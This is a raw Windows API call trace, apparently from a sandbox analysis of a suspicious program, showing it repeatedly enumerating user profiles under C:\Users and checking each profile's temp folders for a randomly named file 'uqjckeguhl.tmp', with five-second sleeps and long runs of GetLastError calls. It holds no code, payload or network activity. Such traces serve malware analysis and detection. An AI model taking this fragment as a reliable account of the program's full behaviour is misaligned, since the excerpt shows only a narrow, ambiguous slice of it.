	[0098.614] FindNextFileW (in: hFindFile=0x664ab8, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0
	[0098.614] FindClose (in: hFindFile=0x664ab8 | out: hFindFile=0x664ab8) returned 1
	[0098.614] Sleep (dwMilliseconds=0x1388) 
	[0103.628] GetProfilesDirectoryW () returned 0x0
	[0103.628] GetProfilesDirectoryW () returned 0x1
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0x3959698
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.629] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0103.630] FindNextFileW (in: hFindFile=0x3959698, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] lstrcmpW (lpString1="..", lpString2=".") returned 1
	[0103.630] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0103.630] FindNextFileW (in: hFindFile=0x3959698, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.630] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] lstrcmpW (lpString1="All Users", lpString2=".") returned 1
	[0103.631] lstrcmpW (lpString1="All Users", lpString2="..") returned 1
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.631] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.632] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.633] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.634] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.635] GetLastError () returned 0x7a
	[0103.636] GetLastError () returned 0x7a
	[0103.636] GetLastError () returned 0x7a
	[0103.636] GetLastError () returned 0x7a
	[0103.636] GetLastError () returned 0x7a
	[0103.636] GetLastError () returned 0x7a
	[0103.636] GetLastError () returned 0x7a
	[0103.636] GetLastError () returned 0x7a
	[0103.636] GetLastError () returned 0x7a
	[0103.636] GetLastError () returned 0x7a
	[0103.636] GetLastError () returned 0x7a
	[0103.636] GetLastError () returned 0x7a
	[0103.636] GetLastError () returned 0x7a
	[0103.636] GetLastError () returned 0x7a
	[0103.636] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 52
	[0103.636] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0103.636] GetLastError () returned 0x3
	[0103.636] GetLastError () returned 0x3
	[0103.636] GetLastError () returned 0x3
	[0103.636] GetLastError () returned 0x3
	[0103.636] GetLastError () returned 0x3
	[0103.636] GetLastError () returned 0x3
	[0103.636] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.637] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] GetLastError () returned 0x3
	[0103.638] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 53
	[0103.638] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0103.638] FindNextFileW (in: hFindFile=0x3959698, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0103.638] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] lstrcmpW (lpString1="Default", lpString2=".") returned 1
	[0103.639] lstrcmpW (lpString1="Default", lpString2="..") returned 1
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.639] GetLastError () returned 0x3
	[0103.640] GetLastError () returned 0x3
	[0103.640] GetLastError () returned 0x3
	[0103.640] GetLastError () returned 0x3
	[0103.640] GetLastError () returned 0x3
	[0103.640] GetLastError () returned 0x3
	[0103.640] GetLastError () returned 0x3
	[0103.640] GetLastError () returned 0x3
	[0103.640] GetLastError () returned 0x3
	[0103.640] GetLastError () returned 0x3
	[0103.640] GetLastError () returned 0x3
	[0103.640] GetLastError () returned 0x3
	[0103.640] GetLastError () returned 0x3
	[0103.640] GetLastError () returned 0x3
	[0103.640] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 50
	[0103.640] GetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0103.641] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 51
	[0103.641] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0103.643] FindNextFileW (in: hFindFile=0x3959698, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0103.643] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 55
	[0103.643] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0103.644] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 56
	[0103.644] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0103.645] FindNextFileW (in: hFindFile=0x3959698, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0103.646] FindNextFileW (in: hFindFile=0x3959698, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0103.646] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 51
	[0103.646] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0103.646] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 52
	[0103.646] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0103.646] FindNextFileW (in: hFindFile=0x3959698, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0103.646] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 49
	[0103.647] GetFileAttributesW (lpFileName="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0103.647] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 50
	[0103.647] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0103.647] FindNextFileW (in: hFindFile=0x3959698, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0
	[0103.647] FindClose (in: hFindFile=0x3959698 | out: hFindFile=0x3959698) returned 1
	[0103.647] Sleep (dwMilliseconds=0x1388) 
	[0108.663] GetProfilesDirectoryW () returned 0x0
	[0108.670] GetProfilesDirectoryW () returned 0x1
	[0108.670] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0x3959698
	[0108.670] FindNextFileW (in: hFindFile=0x3959698, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0108.671] FindNextFileW (in: hFindFile=0x3959698, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0108.671] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 52
	[0108.671] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0108.671] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 53
	[0108.671] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0108.672] FindNextFileW (in: hFindFile=0x3959698, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0108.672] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 50
	[0108.672] GetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0108.673] wsprintfW (in: param_1=0x68ab48, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 51
	[0108.673] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0108.675] FindNextFileW (in: hFindFile=0x3959698, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
